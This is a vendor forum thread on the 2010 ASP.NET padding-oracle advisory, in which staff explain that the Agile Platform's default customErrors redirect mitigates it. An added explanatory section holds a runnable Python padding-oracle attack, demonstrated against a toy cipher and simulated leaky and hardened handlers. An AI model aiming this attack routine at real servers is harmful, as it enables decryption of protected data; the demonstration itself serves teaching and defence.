AcacioPN
Staff
ASP.NET / IIS Security Vulnerability - No impact on Agile Platform
Question
Hi everyone
Recently Microsoft released a Security Advisory reporting a security vulnerability in ASP.NET. This vulnerability exists in all versions.
More details can be found in the following links:
https://www.microsoft.com/technet/security/advisory/2416728.mspx
https://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx?mkt_tok=3RkMMJWWfF9wsRonuq/LZKXonjHpfsX64u4rUKa2lMI/0ER3fOvrPUfGjI4GRMN0dvycMRAVFZl5nQhXDu6QaI5V8fA%3D
This vulnerability makes it possible, in affected systems, to request and download protected files (such as web.config) and decrypt data from encrypted ViewState. The vulnerability exists because, in response to specific requests, ASP.NET will return custom error codes, which enable an attacker to gather information allowing them to obtain the remainder of the cypher.
The workaround for this particular problem is to set a default redirect for all custom errors in ASP.NET.
OutSystems Agile Platform already has the suggested workaround applied. By default, all eSpaces have the following content in web.config:
<customErrors mode="RemoteOnly" defaultRedirect="/customHandlers/internalerror.aspx">
<error statusCode="404" redirect="/customHandlers/notfound.aspx"/>
</customErrors>
This is valid for all currently supported versions (4.2, 5.0, 5.1) and even for some older versions (at least 4.1 and 4.0 have this code built-in). So unless you remove them explicitly (with the FactoryConfiguration solution), your eSpaces in IIS should be well protected.
If you have any additional questions you would like to ask regarding this vulnerability and the Agile Platform, feel free to post them here.
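The mechanism behind the advisory, as an added example that is not part of the original post and is not OutSystems or Microsoft code: a small Python model of a CBC padding oracle. A server that answers "padding is invalid" differently from "padding fine but content rejected" lets an attacker learn one byte of intermediate state per roughly 256 requests and so decrypt a ViewState-style blob without the key; a server that folds every failure into the same redirect, as the customErrors block above does, gives the same attack nothing to distinguish. The block cipher here is a constructed HMAC-SHA256 Feistel stand-in for AES (standard library only), the handler names, status codes, `viewstate:` prefix and sample payload are assumptions, and the redirect target is taken from the web.config fragment on this page.

```python
import hashlib
import hmac
import os

BLOCK, HALF, ROUNDS = 16, 8, 4

class PaddingError(Exception): """CBC plaintext did not end in valid PKCS#7 padding."""
class OracleFailed(Exception): """Responses no longer tell bad padding apart from other errors."""

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, rnd, half):
    # Round function of a constructed HMAC-SHA256 Feistel cipher: a stand-in for AES, not ASP.NET's own cipher
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:HALF]

def block_encrypt(key, block):
    l, r = block[:HALF], block[HALF:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:HALF], block[HALF:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("Padding is invalid and cannot be removed.")
    return data[:-n]

SERVER_KEY = os.urandom(32)  # server secret; the attacker never learns it

def protect(key, state):
    """Server side: view state travels as iv || CBC(pkcs7_pad(state))."""
    padded, prev = pkcs7_pad(state), os.urandom(BLOCK)
    out = prev
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def unprotect(key, blob):
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    plain = b"".join(_xor(block_decrypt(key, cur), prev) for prev, cur in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)

def leaky_handler(blob):
    """Before the workaround: bad padding and bad content get different responses (status codes assumed)."""
    try:
        state = unprotect(SERVER_KEY, blob)
    except PaddingError as exc:
        return 500, str(exc)
    return (200, "OK") if state.startswith(b"viewstate:") else (400, "Invalid view state")

def hardened_handler(blob):
    """With defaultRedirect applied: every failure collapses into the same redirect."""
    try:
        ok = unprotect(SERVER_KEY, blob).startswith(b"viewstate:")
    except PaddingError:
        ok = False
    return (200, "OK") if ok else (302, "/customHandlers/internalerror.aspx")

def padding_oracle_attack(oracle, blob):
    """Recover the padded plaintext of iv || ct using only oracle(blob) -> bool, 'was the padding valid?'."""
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # block_decrypt(key, cur), learnt right to left
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            crafted = bytearray(inter[j] ^ pad if j > pos else 0 for j in range(BLOCK))
            for guess in range(256):
                crafted[pos] = guess
                probe = bytearray(crafted)
                probe[pos - 1] ^= 0xFF  # for pad 1, re-check with the byte before disturbed to reject an accidental \x02\x02
                if oracle(bytes(crafted) + cur) and (pad > 1 or oracle(bytes(probe) + cur)):
                    inter[pos] = guess ^ pad
                    break
            else:
                raise OracleFailed(f"no response distinguishes padding validity at byte {pos}")
        recovered += _xor(inter, prev)
    return recovered

def demo():
    secret = b"viewstate:user=alice;role=admin"  # constructed sample payload
    blob = protect(SERVER_KEY, secret)
    leaked = pkcs7_unpad(padding_oracle_attack(lambda b: leaky_handler(b)[0] != 500, blob))
    try:
        padding_oracle_attack(lambda b: hardened_handler(b)[0] != 302, blob)
        return leaked, True
    except OracleFailed:
        return leaked, False  # the uniform redirect gives the attacker nothing to distinguish
```

Running `demo()` recovers the full payload from the leaky handler and raises `OracleFailed` on the first byte against the hardened one. Two practitioner caveats: the customErrors block only closes the response-content channel, which is why Microsoft's workaround page also mapped every status to one error page and put a small random delay in that page so response timing could not stand in for the status code; and the workaround is a mitigation, with the actual fix being the MS10-070 update that Microsoft shipped for this advisory.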
Miguel João
Staff
Hi All
One final note on this subject.
If you enable the Remote Stack Display setting in your eSpace detail operation settings you might get affected by this security vulnerability, because it will show the full error dump and content to users accessing the web pages remotely.
As long as you keep this setting unchecked (which is the default value on Agile Platform), it shouldn't be a problem.
Cheers
Miguel Simões João